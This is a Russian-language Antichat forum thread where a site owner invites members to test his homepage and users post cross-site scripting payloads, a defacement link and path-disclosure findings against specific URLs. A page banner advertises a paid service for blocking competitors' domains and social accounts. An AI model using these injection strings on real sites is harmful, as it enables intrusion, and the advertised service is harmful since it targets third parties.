gibs0n.name

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
gibs0n.name

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

gibs0n.name

20.02.2008, 00:25

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

С нами: 10636106

Репутация: 705

gibs0n.name

Доброго времени суток! Дописываю свою хоум пагу, мб есть какие то баги/пожелания/предложения по содержимому и по дизу прошу написать. Просто легче исправлять что то когда знаешь что именно нужно исправлять.
Авторам утилит которые выложенны на сайте, просьба отписаться если они не хотели бы их там видеть. Заранее спс.

𝕏 Twitter Reddit Telegram Копировать ссылку

21.02.2008, 18:29

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

С нами: 10447337

Репутация: 807

в утилите en\de(code) string проходят скрипты.

в ие все намного хуже, чем предыдущий скрин)

http://gibs0n.name/tools/mail.php?dxparam="><script>alert()</script>

Последний раз редактировалось freddi; 21.02.2008 в 18:47..

21.02.2008, 20:08

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,315

С нами: 10248806

Репутация: 2371

XSS

Код:

POST / host='"/><script>alert(/1/)</script>

Код:

POST /tools/dxval='"/><script>alert(/1/)</script>

При добавлении коментария можно обойти js на инкорект нейм что является уязвимым...

Короче почти во всех тулзах XSS

Последний раз редактировалось Isis; 21.02.2008 в 20:15..

21.02.2008, 23:09

bobob

Участник форума

Регистрация: 02.06.2006

Сообщений: 241

С нами: 10495658

Репутация: 142

дефейс кнопки)

http://gibs0n.name/tools/mail.php?dxparam=hacked

22.02.2008, 00:20

Macro

Постоянный

Регистрация: 11.11.2006

Сообщений: 595

С нами: 10261766

Репутация: 1079

Автоддос с помощью тулзы pinch flooder =)

xss для IE (в опере урлэнкодятся эти символы)

http://gibs0n.name/index.php/";alert(99);"

Последний раз редактировалось Macro; 22.02.2008 в 00:31..

22.02.2008, 01:21

flintstone

Новичок

Регистрация: 16.12.2007

Сообщений: 6

С нами: 9686401

Репутация: 6

Раскрытие содержания кода если выделить шапку в http://gibs0n.name/?do=sniff&order='"/><script>alert(/1/)</script>
XSS если ввести в Host information: <script>alert("1")</script>

22.02.2008, 02:06

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

С нами: 10636106

Репутация: 705

Цитата:

При добавлении коментария можно обойти js на инкорект нейм что является уязвимым...

2 Isis каким образом?
во сновном ксс в тузлах сторонних разработчиков, буду исправлять=\
мб кто что скажет как можно диз по лучше сделать?

07.03.2008, 01:25

imajo.ati

Участник форума

Регистрация: 21.02.2008

Сообщений: 255

С нами: 9589849

Репутация: 177

http://gibs0n.name/?do=";alert()//

IE не кодирует кавычку и получается xss

а, не увидел, нашли уже =) но там не в параметрах дело - запрос напрямую вставляется в скрипт

Последний раз редактировалось imajo.ati; 07.03.2008 в 01:27..

23.03.2009, 01:21

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

С нами: 10636106

Репутация: 705

Заапаем тему =)
Переписал сайт на симфони, еще не все дописано, но пока что есть
http://gibs0n.name

зы За конструктивные предложения с меня +
зыы Кто хочет обменяться ссылками в личку или аську.

#10

23.03.2009, 02:19

BlackSun

Познавший АНТИЧАТ

Регистрация: 01.04.2007

Сообщений: 1,268

С нами: 10058786

Репутация: 4589

XSS, раскрытие путей
http://gibs0n.name/poll_results/9999999')<img src=. onerror=alert()>
Раскрытие путей можно найти в сорце, не вдавался в подробности, почему в браузере этот блок не показывается

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход